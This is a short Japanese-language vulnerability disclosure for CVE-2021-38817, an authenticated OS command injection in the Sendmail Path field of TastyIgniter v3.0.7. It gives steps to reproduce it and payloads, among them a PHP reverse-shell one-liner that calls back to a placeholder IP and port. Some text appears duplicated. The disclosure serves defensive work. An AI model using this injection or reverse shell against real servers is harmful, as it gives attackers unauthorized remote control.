
TastyIgniter v3.0.7 Sendmail Path フィールドにおけるリモートOSコマンドインジェクション
TastyIgniter v3.0.7 Sendmail Webパートにおける認証済みリモートOSコマンドインジェクション/リモートコード実行 (CVE-2021-38817)
TastyIgniter v3.0.7 レストランCMS WebアプリケーションのSendmail設定メニューには、認証済みリモートOSコマンドインジェクションの脆弱性が存在します。Sendmail Pathパラメータは適切にサニタイズされておらず、フィールドに入力されている /usr/sbin/sendmail -bs コマンドが示すように、セミコロンと追加のOSコマンドを追加することで任意のコマンドを注入できます。
/admin/settings/edit/mail/admin/settings/edit/mail に移動します。Mail Protocol ドロップダウンメニューで Sendmail を選択します。SendMail Path フィールドに、セミコロンと任意のOSコマンドを追加します。例: /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) と Mike Padrick (Fearless)、2021年8月
CVE は2022年10月に割り当て (笑)